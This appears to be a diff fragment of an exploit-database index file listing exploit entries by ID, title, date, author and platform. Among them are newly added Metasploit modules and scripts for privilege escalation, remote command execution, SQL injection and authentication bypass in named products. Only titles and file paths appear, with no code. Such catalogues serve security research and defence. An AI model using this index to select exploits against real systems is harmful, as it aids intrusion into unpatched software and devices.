12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10125,6 +10128,8 @@ id,file,description,date,author,type,platform,port
45913,exploits/linux/local/45913.rb,"Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,linux,
45915,exploits/linux/local/45915.rb,"Linux - Nested User Namespace idmap Limit Local Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,linux,
45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos,
+45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows,
+45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16978,6 +16983,7 @@ id,file,description,date,author,type,platform,port
45909,exploits/hardware/remote/45909.rb,"Netgear Devices - Unauthenticated Remote Command Execution (Metasploit)",2018-11-27,Metasploit,remote,hardware,80
45914,exploits/linux/remote/45914.rb,"PHP imap_open - Remote Code Execution (Metasploit)",2018-11-29,Metasploit,remote,linux,
45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple,
+45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40418,3 +40424,5 @@ id,file,description,date,author,type,platform,port
45902,exploits/php/webapps/45902.txt,"Ticketly 1.0 - 'kind_id' SQL Injection",2018-11-26,"Javier Olmedo",webapps,php,80
45903,exploits/php/webapps/45903.txt,"No-Cms 1.0 - 'order_by' SQL Injection",2018-11-26,"Loading Kura Kura",webapps,php,80
45904,exploits/hardware/webapps/45904.txt,"Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal",2018-11-26,"numan türle",webapps,hardware,80
+45918,exploits/hardware/webapps/45918.py,"Schneider Electric PLC - Session Calculation Authentication Bypass",2018-11-30,Photubias,webapps,hardware,80
+45920,exploits/cgi/webapps/45920.txt,"Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass",2018-11-30,LiquidWorm,webapps,cgi,80